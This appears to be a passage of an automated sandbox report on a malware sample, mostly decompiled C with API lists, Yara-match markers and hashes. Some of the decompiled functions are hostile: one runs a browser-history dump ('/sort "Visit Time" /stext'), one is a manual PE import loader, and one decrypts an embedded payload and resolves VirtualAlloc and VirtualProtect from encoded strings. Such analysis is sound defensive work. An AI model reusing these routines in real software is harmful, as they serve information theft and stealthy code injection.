                                    											 *(_t98 + 0x21c) = _t94;
                                    											_t78 = 1;
                                    											__eflags = _v28 - 1;
                                    											if(_v28 <= 1) {
                                    												 *(_t98 + 8) = _t94;
                                    											} else {
                                    												__eflags = _v22;
                                    												_t72 =  &_v22;
                                    												if(_v22 != 0) {
                                    													while(1) {
                                    														_t88 = _t72[1];
                                    														__eflags = _t88;
                                    														if(_t88 == 0) {
                                    															goto L16;
                                    														}
                                    														_t91 = _t88 & 0x000000ff;
                                    														_t89 =  *_t72 & 0x000000ff;
                                    														while(1) {
                                    															__eflags = _t89 - _t91;
                                    															if(_t89 > _t91) {
                                    																break;
                                    															}
                                    															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
                                    															_t89 = _t89 + 1;
                                    															__eflags = _t89;
                                    														}
                                    														_t72 =  &(_t72[2]);
                                    														__eflags =  *_t72;
                                    														if( *_t72 != 0) {
                                    															continue;
                                    														}
                                    														goto L16;
                                    													}
                                    												}
                                    												L16:
                                    												_t73 = _t98 + 0x1a;
                                    												_t87 = 0xfe;
                                    												do {
                                    													 *_t73 =  *_t73 | 0x00000008;
                                    													_t73 =  &(_t73[1]);
                                    													_t87 = _t87 - 1;
                                    													__eflags = _t87;
                                    												} while (_t87 != 0);
                                    												 *(_t98 + 0x21c) = L00446F2E( *(_t98 + 4));
                                    												 *(_t98 + 8) = _t78;
                                    											}
                                    											_t95 = _t98 + 0xc;
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											L36:
                                    											E00447044(_t78, _t91, _t95, _t98, _t98);
                                    											L37:
                                    											__eflags = 0;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    						goto L39;
                                    					}
                                    					L00431F00(_t94, _t98 + 0x18, _t94, 0x101);
                                    					_t54 = _v32 * 0x30;
                                    					__eflags = _t54;
                                    					_v36 = _t54;
                                    					_t55 = _t54 + 0x46a498;
                                    					_v32 = _t55;
                                    					do {
                                    						__eflags =  *_t55;
                                    						_t82 = _t55;
                                    						if( *_t55 != 0) {
                                    							while(1) {
                                    								_t62 = _t82[1];
                                    								__eflags = _t62;
                                    								if(_t62 == 0) {
                                    									break;
                                    								}
                                    								_t92 =  *_t82 & 0x000000ff;
                                    								_t63 = _t62 & 0x000000ff;
                                    								while(1) {
                                    									__eflags = _t92 - _t63;
                                    									if(_t92 > _t63) {
                                    										break;
                                    									}
                                    									__eflags = _t92 - 0x100;
                                    									if(_t92 < 0x100) {
                                    										_t31 = _t94 + 0x46a480; // 0x8040201
                                    										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
                                    										_t92 = _t92 + 1;
                                    										__eflags = _t92;
                                    										_t63 = _t82[1] & 0x000000ff;
                                    										continue;
                                    									}
                                    									break;
                                    								}
                                    								_t82 =  &(_t82[2]);
                                    								__eflags =  *_t82;
                                    								if( *_t82 != 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							_t55 = _v32;
                                    						}
                                    						_t94 = _t94 + 1;
                                    						_t55 = _t55 + 8;
                                    						_v32 = _t55;
                                    						__eflags = _t94 - 4;
                                    					} while (_t94 < 4);
                                    					 *(_t98 + 4) = _t78;
                                    					 *(_t98 + 8) = 1;
                                    					 *(_t98 + 0x21c) = L00446F2E(_t78);
                                    					_t83 = _t98 + 0xc;
                                    					_t91 = _v36 + 0x46a48c;
                                    					_t95 = 6;
                                    					do {
                                    						_t58 =  *_t91;
                                    						_t91 = _t91 + 2;
                                    						 *_t83 = _t58;
                                    						_t83 = _t83 + 2;
                                    						_t95 = _t95 - 1;
                                    						__eflags = _t95;
                                    					} while (_t95 != 0);
                                    					goto L36;
                                    				} else {
                                    					L00446FDF(_t98);
                                    				}
                                    				L39:
                                    				return L0042FD1B(_v8 ^ _t99);
                                    			}
                                    0x004474fd
                                    0x00447500
                                    0x0044751c
                                    0x0044751c
                                    0x0044751e
                                    0x00000000
                                    0x00000000
                                    0x00447505
                                    0x0044750b
                                    0x0044750d
                                    0x00447513
                                    0x00447517
                                    0x00447517
                                    0x00447518
                                    0x00000000
                                    0x00447518
                                    0x00000000
                                    0x0044750b
                                    0x00447520
                                    0x00447523
                                    0x00447526
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00447526
                                    0x00447528
                                    0x00447528
                                    0x0044752b
                                    0x0044752c
                                    0x0044752f
                                    0x00447532
                                    0x00447532
                                    0x00447538
                                    0x0044753b
                                    0x0044754a
                                    0x00447553
                                    0x00447558
                                    0x0044755e
                                    0x0044755f
                                    0x0044755f
                                    0x00447562
                                    0x00447565
                                    0x00447568
                                    0x0044756b
                                    0x0044756b
                                    0x0044756b
                                    0x00000000
                                    0x004473bf
                                    0x004473c0
                                    0x004473c6
                                    0x0044757a
                                    0x00447589

                                    APIs
                                      • Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97
                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
                                    • GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID: :rD
                                    • API String ID: 546120528-3120900009
                                    • Opcode ID: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
                                    • Instruction ID: 614f5d5ef064064d7ec38ea7b35d3f5f756231f868e2d753d05d5f6cbb9767d4
                                    • Opcode Fuzzy Hash: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
                                    • Instruction Fuzzy Hash: 65513370A086059EFB20CF35C8816BBBFA5EF41304F14406FD0868B251E73D9947CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 96%
                                    			E00447044(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
                                    				signed int _v8;
                                    				char _v264;
                                    				char _v520;
                                    				char _v776;
                                    				char _v1800;
                                    				char _v1814;
                                    				struct _cpinfo _v1820;
                                    				intOrPtr _v1824;
                                    				signed int _v1828;
                                    				signed int _t63;
                                    				void* _t67;
                                    				signed int _t68;
                                    				intOrPtr _t69;
                                    				void* _t72;
                                    				char _t73;
                                    				char _t74;
                                    				signed char _t75;
                                    				signed int _t76;
                                    				signed char _t86;
                                    				char _t87;
                                    				char _t90;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				signed int _t95;
                                    				void* _t96;
                                    				char* _t97;
                                    				intOrPtr _t101;
                                    				signed int _t102;
                                    
                                    				_t95 = __edx;
                                    				_t63 =  *0x46a00c; // 0xbd45ae92
                                    				_v8 = _t63 ^ _t102;
                                    				_t2 =  &_a4; // 0x447576
                                    				_t101 =  *_t2;
                                    				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
                                    					_t96 = _t101 + 0x119;
                                    					_t90 = 0;
                                    					_t67 = 0xffffff9f;
                                    					_t68 = _t67 - _t96;
                                    					__eflags = _t68;
                                    					_v1828 = _t68;
                                    					do {
                                    						_t97 = _t96 + _t90;
                                    						_t69 = _t68 + _t97;
                                    						_v1824 = _t69;
                                    						__eflags = _t69 + 0x20 - 0x19;
                                    						if(_t69 + 0x20 > 0x19) {
                                    							__eflags = _v1824 - 0x19;
                                    							if(_v1824 > 0x19) {
                                    								 *_t97 = 0;
                                    							} else {
                                    								_t72 = _t101 + _t90;
                                    								_t57 = _t72 + 0x19;
                                    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                    								__eflags =  *_t57;
                                    								_t59 = _t90 - 0x20; // -32
                                    								_t73 = _t59;
                                    								goto L24;
                                    							}
                                    						} else {
                                    							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
                                    							_t54 = _t90 + 0x20; // 0x20
                                    							_t73 = _t54;
                                    							L24:
                                    							 *_t97 = _t73;
                                    						}
                                    						_t68 = _v1828;
                                    						_t96 = _t101 + 0x119;
                                    						_t90 = _t90 + 1;
                                    						__eflags = _t90 - 0x100;
                                    					} while (_t90 < 0x100);
                                    				} else {
                                    					_t74 = 0;
                                    					do {
                                    						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
                                    						_t74 = _t74 + 1;
                                    					} while (_t74 < 0x100);
                                    					_t75 = _v1814;
                                    					_t93 =  &_v1814;
                                    					_v264 = 0x20;
                                    					while(1) {
                                    						_t108 = _t75;
                                    						if(_t75 == 0) {
                                    							break;
                                    						}
                                    						_t95 =  *(_t93 + 1) & 0x000000ff;
                                    						_t76 = _t75 & 0x000000ff;
                                    						while(1) {
                                    							__eflags = _t76 - _t95;
                                    							if(_t76 > _t95) {
                                    								break;
                                    							}
                                    							__eflags = _t76 - 0x100;
                                    							if(_t76 < 0x100) {
                                    								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
                                    								_t76 = _t76 + 1;
                                    								__eflags = _t76;
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						_t93 = _t93 + 2;
                                    						__eflags = _t93;
                                    						_t75 =  *_t93;
                                    					}
                                    					E004493AC(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
                                    					L0044480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0);
                                    					L0044480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
                                    					_t94 = 0;
                                    					do {
                                    						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
                                    						if((_t86 & 0x00000001) == 0) {
                                    							__eflags = _t86 & 0x00000002;
                                    							if((_t86 & 0x00000002) == 0) {
                                    								 *((char*)(_t101 + _t94 + 0x119)) = 0;
                                    							} else {
                                    								_t37 = _t101 + _t94 + 0x19;
                                    								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
                                    								__eflags =  *_t37;
                                    								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
                                    								goto L15;
                                    							}
                                    						} else {
                                    							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
                                    							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
                                    							L15:
                                    							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
                                    						}
                                    						_t94 = _t94 + 1;
                                    					} while (_t94 < 0x100);
                                    				}
                                    				return L0042FD1B(_v8 ^ _t102);
                                    			}

                                    APIs
                                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Info
                                    • String ID: $vuD
                                    • API String ID: 1807457897-1530330280
                                    • Opcode ID: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
                                    • Instruction ID: 92fcf1547ebdf66eb0b87621d9a8ff62090b57e6ee7fe94dbbcc2872a12e2c7f
                                    • Opcode Fuzzy Hash: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
                                    • Instruction Fuzzy Hash: 9641F9705082489FEF258E64CC84BF7BBB9DB55308F2404EEE58A87242D3399E46DF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 90%
                                    			E0040414D(void* __ebx) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				char _v148;
                                    				char _v172;
                                    				short _v692;
                                    				void* __edi;
                                    				void* _t40;
                                    				struct HINSTANCE__* _t81;
                                    				struct HINSTANCE__* _t84;
                                    				void* _t85;
                                    
                                    				_t48 = __ebx;
                                    				_t81 = 0;
                                    				GetModuleFileNameW(0,  &_v692, 0x104);
                                    				E004020D5(__ebx,  &_v52);
                                    				E0041800F( &_v28, 0x30, L00401F95(E00417093( &_v76)));
                                    				L00401FC7();
                                    				L00401F95(0x46c1a0);
                                    				E0041432B(L00401EEB(E004030A6(_t48,  &_v100, E00404429(_t48,  &_v124, E00404405(_t48,  &_v148,  &_v692, 0, E0040427F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				_t84 = 0;
                                    				while(1) {
                                    					_t40 = L00401EEB( &_v28);
                                    					_t80 =  &_v52;
                                    					if(L004179DC(_t40,  &_v52) != 0) {
                                    						break;
                                    					}
                                    					Sleep(0xfa);
                                    					_t84 =  &(_t84->i);
                                    					if(_t84 < 0x14) {
                                    						continue;
                                    					} else {
                                    					}
                                    					L5:
                                    					L00401EF0();
                                    					L00401FC7();
                                    					return _t81;
                                    				}
                                    				E004020EC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
                                    				_push(0x9d);
                                    				L00404AA4(_t48, 0x46c138, _t80, __eflags);
                                    				_t81 = 1;
                                    				__eflags = 1;
                                    				goto L5;
                                    			}

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167
                                      • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,76D7FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(004041F6,?,004041F6,0045F464), ref: 00414341
                                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(0045F464,?,004041F6,0045F464), ref: 0041434A
                                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                                    • Sleep.KERNEL32(000000FA,0045F464), ref: 00404239
                                    Strings
                                    • /sort "Visit Time" /stext ", xrefs: 004041B3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "
                                    • API String ID: 368326130-1573945896
                                    • Opcode ID: bb8bfcea86a4cc94e3f242122d5bd9489644525cb83876980c6faf47c846c008
                                    • Instruction ID: 7061a5f3a0732a34bedf69b2f97f4882e16be89ee39d0e7819724232ed9fbdaa
                                    • Opcode Fuzzy Hash: bb8bfcea86a4cc94e3f242122d5bd9489644525cb83876980c6faf47c846c008
                                    • Instruction Fuzzy Hash: CB316371A102185BCB14FAB5DC969EE77769F90308F40007FB906775E2EF38194ACA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 55%
                                    			E0040F4FE(intOrPtr* __ecx) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr* _v16;
                                    				signed short* _v20;
                                    				intOrPtr _t41;
                                    				intOrPtr _t44;
                                    				intOrPtr _t46;
                                    				signed short _t57;
                                    				signed int _t58;
                                    				intOrPtr _t59;
                                    				intOrPtr* _t60;
                                    				void* _t64;
                                    				void* _t66;
                                    				intOrPtr _t68;
                                    				intOrPtr _t76;
                                    				intOrPtr* _t79;
                                    				intOrPtr _t80;
                                    				void _t81;
                                    				signed short* _t82;
                                    				void* _t87;
                                    				intOrPtr* _t88;
                                    				void* _t89;
                                    
                                    				_t88 = __ecx;
                                    				_t87 = 1;
                                    				_t41 =  *__ecx;
                                    				_t68 =  *((intOrPtr*)(__ecx + 4));
                                    				_v12 = _t68;
                                    				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
                                    					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
                                    					if(IsBadReadPtr(_t64, 0x14) == 0) {
                                    						_t66 = _t64 + 0x10;
                                    						while(1) {
                                    							_t44 =  *((intOrPtr*)(_t66 - 4));
                                    							if(_t44 == 0) {
                                    								goto L23;
                                    							}
                                    							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
                                    							_v8 = _t46;
                                    							if(_t46 == 0) {
                                    								_push(0x7e);
                                    								goto L22;
                                    							} else {
                                    								_push(4 +  *(_t88 + 0xc) * 4);
                                    								_push( *((intOrPtr*)(_t88 + 8)));
                                    								_t80 = L0043AE34();
                                    								if(_t80 == 0) {
                                    									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
                                    									_push(0xe);
                                    									L22:
                                    									SetLastError();
                                    									_t87 = 0;
                                    								} else {
                                    									 *((intOrPtr*)(_t88 + 8)) = _t80;
                                    									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
                                    									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
                                    									_t81 =  *(_t66 - 0x10);
                                    									if(_t81 == 0) {
                                    										_t81 =  *_t66;
                                    									}
                                    									_t82 = _t81 + _v12;
                                    									_t76 = _v8;
                                    									_v16 =  *_t66 + _v12;
                                    									_v20 = _t82;
                                    									if( *_t82 != 0) {
                                    										while(1) {
                                    											_t57 =  *_t82;
                                    											_push( *((intOrPtr*)(_t88 + 0x34)));
                                    											if(_t57 >= 0) {
                                    												_t58 = _t57 + _v12 + 2;
                                    											} else {
                                    												_t58 = _t57 & 0x0000ffff;
                                    											}
                                    											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
                                    											_t79 = _v16;
                                    											_t89 = _t89 + 0xc;
                                    											 *_t79 = _t59;
                                    											_t60 = _t79;
                                    											_t76 = _v8;
                                    											if( *_t60 == 0) {
                                    												break;
                                    											}
                                    											_t82 =  &(_v20[2]);
                                    											_v16 = _t60 + 4;
                                    											_v20 = _t82;
                                    											if( *_t82 != 0) {
                                    												continue;
                                    											} else {
                                    											}
                                    											goto L16;
                                    										}
                                    										_t87 = 0;
                                    									}
                                    									L16:
                                    									if(_t87 == 0) {
                                    										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
                                    										SetLastError(0x7f);
                                    									} else {
                                    										_t66 = _t66 + 0x14;
                                    										if(IsBadReadPtr(_t66 - 0x10, 0x14) == 0) {
                                    											continue;
                                    										} else {
                                    										}
                                    									}
                                    								}
                                    							}
                                    							goto L23;
                                    						}
                                    					}
                                    					L23:
                                    				}
                                    				return _t87;
                                    			}
                                    0x0040f505
                                    0x0040f50a
                                    0x0040f50b
                                    0x0040f50d
                                    0x0040f510
                                    0x0040f51a
                                    0x0040f527
                                    0x0040f534
                                    0x0040f53a
                                    0x0040f53d
                                    0x0040f53d
                                    0x0040f542
                                    0x00000000
                                    0x00000000
                                    0x0040f54f
                                    0x0040f552
                                    0x0040f559
                                    0x0040f630
                                    0x00000000
                                    0x0040f55f
                                    0x0040f569
                                    0x0040f56a
                                    0x0040f572
                                    0x0040f578
                                    0x0040f627
                                    0x0040f62c
                                    0x0040f632
                                    0x0040f632
                                    0x0040f638
                                    0x0040f57e
                                    0x0040f584
                                    0x0040f587
                                    0x0040f58a
                                    0x0040f58d
                                    0x0040f592
                                    0x0040f594
                                    0x0040f594
                                    0x0040f596
                                    0x0040f59e
                                    0x0040f5a4
                                    0x0040f5a7
                                    0x0040f5aa
                                    0x0040f5ac
                                    0x0040f5ac
                                    0x0040f5ae
                                    0x0040f5b3
                                    0x0040f5c0
                                    0x0040f5b5
                                    0x0040f5b5
                                    0x0040f5b5
                                    0x0040f5c4
                                    0x0040f5c7
                                    0x0040f5ca
                                    0x0040f5cd
                                    0x0040f5cf
                                    0x0040f5d1
                                    0x0040f5d7
                                    0x00000000
                                    0x00000000
                                    0x0040f5df
                                    0x0040f5e2
                                    0x0040f5e5
                                    0x0040f5eb
                                    0x00000000
                                    0x00000000
                                    0x0040f5ed
                                    0x00000000
                                    0x0040f5eb
                                    0x0040f5ef
                                    0x0040f5ef
                                    0x0040f5f1
                                    0x0040f5f3
                                    0x0040f612
                                    0x0040f619
                                    0x0040f5f5
                                    0x0040f5f5
                                    0x0040f606
                                    0x00000000
                                    0x00000000
                                    0x0040f60c
                                    0x0040f606
                                    0x0040f5f3
                                    0x0040f578
                                    0x00000000
                                    0x0040f559
                                    0x0040f53d
                                    0x0040f63a
                                    0x0040f63a
                                    0x0040f642

                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
                                    • IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
                                    • SetLastError.KERNEL32(0000007F), ref: 0040F619
                                    • SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
                                    • Instruction ID: 276675e80245dda8867d672efd476c996cb1fc0ae7fab6a88f5e1639ff5a30e1
                                    • Opcode Fuzzy Hash: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
                                    • Instruction Fuzzy Hash: B3419B71A00204EFDB24CF58CC44B6AB7F5FF44711F14887AE446A7A91E739E906DB18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    Non-executed Functions

                                    Memory Dump Source
                                    • Source File: 00000017.00000003.331163599.0000000003B30000.00000004.00000001.sdmp, Offset: 03B30000, based on PE: false
                                    • Associated: 00000017.00000003.356302900.0000000003B30000.00000004.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e220fd88640a154cd486b6824542d8122b44cc7edd1d44cacc1ee9228cfd0c0
                                    • Instruction ID: 6a047a9ca4705df98baf1edc52f620b26e9a8fd01948664796e2ae8fcb4b94f2
                                    • Opcode Fuzzy Hash: 5e220fd88640a154cd486b6824542d8122b44cc7edd1d44cacc1ee9228cfd0c0
                                    • Instruction Fuzzy Hash: FBB0123E1CE2B42EF315592C75676E31F919785754D10504EF3E28B3B36DCAC48626E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000C,?,0070CB24,0000000C,00738188,0000000C), ref: 0070CB6F
                                    • TerminateProcess.KERNEL32(00000000,?,0070CB24,0000000C,00738188,0000000C), ref: 0070CB76
                                    • ExitProcess.KERNEL32 ref: 0070CB88
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: ecdeda74f62463ef14bb1ea4e5f22c91c1280216bfdb398ad4a614c87f675096
                                    • Instruction ID: 2a14e1e5554d4bf3acd624053420b9f3110113bc46fa07dec51b4b092e7e3717
                                    • Opcode Fuzzy Hash: ecdeda74f62463ef14bb1ea4e5f22c91c1280216bfdb398ad4a614c87f675096
                                    • Instruction Fuzzy Hash: D9E09A71000508EBCF126B68D90A9593FA9FB55351F148218F9058A162CB3D9956CA54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 18%
                                    			E1059111E(signed int __eax, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				char _v60;
                                    				intOrPtr* _v64;
                                    				signed int* _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				signed int _v84;
                                    				intOrPtr* _v116;
                                    				struct HINSTANCE__* _v120;
                                    				struct HINSTANCE__* _v124;
                                    				struct HINSTANCE__* _v128;
                                    				char _v136;
                                    				char _v140;
                                    				intOrPtr _v148;
                                    				char _v160;
                                    				intOrPtr _v380;
                                    				intOrPtr _v428;
                                    				intOrPtr _v468;
                                    				char _v508;
                                    				void* __ebp;
                                    				signed int _t111;
                                    				void* _t114;
                                    				struct HINSTANCE__* _t116;
                                    				intOrPtr _t121;
                                    				void* _t122;
                                    				void* _t127;
                                    				intOrPtr _t129;
                                    				intOrPtr* _t131;
                                    				void* _t134;
                                    				void* _t138;
                                    				void* _t142;
                                    				intOrPtr _t146;
                                    				void* _t151;
                                    				unsigned int _t153;
                                    				void* _t155;
                                    				void* _t156;
                                    				unsigned int _t158;
                                    				struct HINSTANCE__* _t160;
                                    				intOrPtr _t161;
                                    				intOrPtr* _t162;
                                    				intOrPtr* _t163;
                                    				intOrPtr _t166;
                                    				intOrPtr* _t167;
                                    				void* _t169;
                                    				signed int* _t170;
                                    				signed int _t172;
                                    				intOrPtr _t174;
                                    				void* _t175;
                                    				signed int _t180;
                                    				void* _t182;
                                    				intOrPtr _t186;
                                    				intOrPtr _t197;
                                    				unsigned int _t199;
                                    				intOrPtr _t202;
                                    				void* _t203;
                                    				signed int _t204;
                                    				signed int _t207;
                                    				void* _t216;
                                    				void* _t225;
                                    				void* _t226;
                                    				void* _t229;
                                    				void* _t233;
                                    				void* _t236;
                                    				intOrPtr _t239;
                                    				void* _t240;
                                    				void* _t241;
                                    				struct HINSTANCE__* _t243;
                                    				void* _t251;
                                    				void* _t254;
                                    				void* _t255;
                                    				void* _t257;
                                    				intOrPtr* _t258;
                                    				intOrPtr* _t260;
                                    				void* _t261;
                                    				intOrPtr* _t264;
                                    				void* _t267;
                                    				void* _t268;
                                    				void* _t269;
                                    				void* _t270;
                                    				void* _t271;
                                    				void* _t272;
                                    				void* _t273;
                                    				void* _t274;
                                    
                                    				_v84 = __eax & 0xffff0000;
                                    				_push(_a4);
                                    				_pop(_t169);
                                    				_t170 = _t169 + 0x72b10;
                                    				_t251 = 0x72b10;
                                    				_t111 = 0x4a68ea1;
                                    				do {
                                    					_t251 = _t251 - 4;
                                    					_t170 = _t170 - 4;
                                    					asm("rol edi, 0x81");
                                    					asm("rol edi, 0x4");
                                    					_t216 =  !( *_t170 - _t111) + _t111;
                                    					asm("bswap edi");
                                    					_t111 = _t111 - 0xb4e3e448;
                                    					asm("bswap edi");
                                    					asm("bswap edi");
                                    					 *_t170 = ( ~(_t216 + _t251 + _t251) + _t111 - 0xad18deb5 ^ _t111) - _t111 ^ _t111;
                                    				} while (_t251 != 0);
                                    				E105914E3(_t111);
                                    				_t114 =  *_a12(_t267, 0x6e72656b, 0x32336c65, 0x6c6c642e, 0);
                                    				_t268 = _t267 + 0x10;
                                    				_t225 = _t114;
                                    				_t116 =  *_a8(_t114, _t268, 0x74726956, 0x416c6175, 0x636f6c6c, 0);
                                    				_t269 = _t268 + 0x10;
                                    				_t160 = _t116;
                                    				if(_t116 == 0) {
                                    					L62:
                                    					return _t116;
                                    				}
                                    				_t116 =  *_a8(_t225, _t269, 0x74726956, 0x506c6175, 0x65746f72, 0x7463);
                                    				_t270 = _t269 + 0x10;
                                    				_v120 = _t116;
                                    				if(_t116 == 0) {
                                    					goto L62;
                                    				}
                                    				_t116 =  *_a8(_t225, _t270, 0x74726956, 0x516c6175, 0x79726575, 0);
                                    				_t271 = _t270 + 0x10;
                                    				_v124 = _t116;
                                    				if(_t116 == 0) {
                                    					goto L62;
                                    				}
                                    				_t116 =  *_a8(_t225, _t271, 0x61427349, 0x61655264, 0x72745064, 0);
                                    				_t272 = _t271 + 0x10;
                                    				_v128 = _t116;
                                    				if(_t116 == 0) {
                                    					goto L62;
                                    				}
                                    				_t226 =  &_v508;
                                    				_t172 = 0x3e;
                                    				memcpy(_t226, _a4 +  *((intOrPtr*)(_a4 + 0x3c)), _t172 << 2);
                                    				_t273 = _t272 + 0xc;
                                    				_t229 = _t226;
                                    				_t121 =  *((intOrPtr*)(_t229 + 0x34));
                                    				_v8 = _t121;
                                    				_t174 =  *((intOrPtr*)(_t229 + 0x50));
                                    				_v12 = _t174;
                                    				_t122 = _t160->i(_t174, 0x3000, 0x40, _t174);
                                    				_t175 = _t121;
                                    				if(_t122 != 0) {
                                    					L8:
                                    					_v16 = _t122;
                                    					_t254 = _a4;
                                    					memcpy(_t122, _t254,  *(_t254 +  *((intOrPtr*)(_t254 + 0x3c)) + 0x54));
                                    					_t274 = _t273 + 0xc;
                                    					_t255 = _t254;
                                    					_t257 = _t255 +  *((intOrPtr*)(_t255 + 0x3c)) + 0xf8;
                                    					do {
                                    						_t233 =  &_v60;
                                    						_t180 = 0xa;
                                    						_t127 = memcpy(_t233, _t257, _t180 << 2);
                                    						_t274 = _t274 + 0xc;
                                    						_t236 = _t233;
                                    						_t197 =  *((intOrPtr*)(_t236 + 0x14));
                                    						if(_t197 != 0) {
